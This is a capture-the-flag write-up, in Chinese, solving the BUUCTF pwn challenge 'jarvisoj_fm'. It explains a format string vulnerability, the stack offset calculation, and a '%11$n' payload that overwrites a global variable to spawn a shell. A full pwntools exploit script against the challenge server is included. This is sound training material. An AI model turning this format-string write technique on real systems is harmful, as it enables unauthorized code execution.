[BUUCTF]PWN——jarvisoj_fm
2024-09-06 02:16:55
jarvisoj_fm
步骤:
例行检查,32位,开启了canary和nx保护
运行一下程序,看看大概的情况
32位ida载入,shift+f12检索程序里的字符串,看见了 " /bin/sh " 字符串
双击跟进,找到程序主体,当x=4的时候会执行system(/bin/sh)
第10行存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4
x_addr=0x804A02C
来找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11
利用x的地址配合上%11$n 将x修改为4
payload=p32(x_addr)+"%11$n"
稍微解释一下payload,首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n
,定位到了偏移为11的位置,往这个位置写入数据,写入的数据由%11$n
前面的参数的长度决定,而我们的x参数的地址,正好是4位,不需要添a来补齐位数就可以直接利用,将x参数的地址的值改成了4,获取了shell
完整exp
from pwn import *
r=remote('node3.buuoj.cn',25582)
x_addr=0x804A02C
payload=p32(x_addr)+"%11$n"
r.sendline(payload)
r.interactive()
最新文章
- MMDrawerController的使用
- json字符串相关转换方法
- js里面“===”与“==”的区别
- javac: cannot execute binary file
- 开源ceph管理平台inkscope部署手册
- linxu select 返回值
- input file图片上传预览
- HTTP协议详解 转自小坦克
- 自己设置 WiFi
- Django 1.9 + celery + django-celry 实现定时任务
- iOS项目之WKWebView替换UIWebView相关
- Django框架----跨表查询及添加记录
- android上使用蓝牙设备进行语音输入
- iOS开发点滴 - 如何通过Segue写代码传递数据从一个ViewController到另一个ViewController(Swift代码)
- VS2015 之 常用快捷键
- 【C语言】字符串与整型数值之间的转换
- Hive Tunning 补充 关于bucket
- 实验五 — — Java网络编程及安全
- 一段有用的javascript加密解密
- DB杂记
热门文章
- myeclipse trial expired暂时解决办法
- [atAGC045E]Fragile Balls
- Java设计模式之(七)——装饰器模式
- SubsamplingScaleImageView 源码解析
- 使用 CSS 轻松实现一些高频出现的奇形怪状按钮
- C/C++ Qt TableWidget 表格组件应用
- AT4168 [ARC100C] Or Plus Max
- Codeforces 1446D2 - Frequency Problem (Hard Version)(根分)
- Telink BLE MESH PWM波的小结
- 24. 解决Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?